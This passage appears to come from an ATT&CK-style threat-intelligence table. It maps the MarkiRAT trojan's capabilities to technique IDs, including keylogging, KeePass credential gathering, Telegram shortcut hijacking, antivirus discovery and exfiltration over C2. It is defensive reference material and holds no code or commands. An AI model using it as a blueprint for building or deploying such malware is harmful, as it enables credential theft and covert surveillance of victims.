| enterprise |
T1071 |
Application Layer Protocol |
- |
| enterprise |
T1071.001 |
Web Protocols |
MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server. |
| enterprise |
T1197 |
BITS Jobs |
MarkiRAT can use BITS Utility to connect with the C2 server. |
| enterprise |
T1547 |
Boot or Logon Autostart Execution |
- |
| enterprise |
T1547.001 |
Registry Run Keys / Startup Folder |
MarkiRAT can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started. |
| enterprise |
T1547.009 |
Shortcut Modification |
MarkiRAT can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable. |
| enterprise |
T1115 |
Clipboard Data |
MarkiRAT can capture clipboard content. |
| enterprise |
T1059 |
Command and Scripting Interpreter |
- |
| enterprise |
T1059.003 |
Windows Command Shell |
MarkiRAT can utilize cmd.exe to execute commands in a victim’s environment. |
| enterprise |
T1555 |
Credentials from Password Stores |
- |
| enterprise |
T1555.005 |
Password Managers |
MarkiRAT can gather information from the Keepass password manager. |
| enterprise |
T1005 |
Data from Local System |
MarkiRAT can upload data from the victim’s machine to the C2 server. |
| enterprise |
T1074 |
Data Staged |
- |
| enterprise |
T1074.001 |
Local Data Staging |
MarkiRAT can store collected data locally in a created .nfo file. |
| enterprise |
T1041 |
Exfiltration Over C2 Channel |
MarkiRAT can exfiltrate locally stored data via its C2. |
| enterprise |
T1083 |
File and Directory Discovery |
MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb. |
| enterprise |
T1105 |
Ingress Tool Transfer |
MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin. |
| enterprise |
T1056 |
Input Capture |
- |
| enterprise |
T1056.001 |
Keylogging |
MarkiRAT can capture all keystrokes on a compromised host. |
| enterprise |
T1036 |
Masquerading |
- |
| enterprise |
T1036.005 |
Match Legitimate Name or Location |
MarkiRAT can masquerade as update.exe and svehost.exe; it has also mimicked legitimate Telegram and Chrome files. |
| enterprise |
T1106 |
Native API |
MarkiRAT can run the ShellExecuteW API via the Windows Command Shell. |
| enterprise |
T1057 |
Process Discovery |
MarkiRAT can search for different processes on a system. |
| enterprise |
T1113 |
Screen Capture |
MarkiRAT can capture screenshots that are initially saved as ‘scr.jpg’. |
| enterprise |
T1518 |
Software Discovery |
MarkiRAT can check for the Telegram installation directory by enumerating the files on disk. |
| enterprise |
T1518.001 |
Security Software Discovery |
MarkiRAT can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products. |
| enterprise |
T1082 |
System Information Discovery |
MarkiRAT can obtain the computer name from a compromised host. |
| enterprise |
T1614 |
System Location Discovery |
- |
| enterprise |
T1614.001 |
System Language Discovery |
MarkiRAT can use the GetKeyboardLayout API to check if a compromised host’s keyboard is set to Persian. |
| enterprise |
T1033 |
System Owner/User Discovery |
MarkiRAT can retrieve the victim’s username. |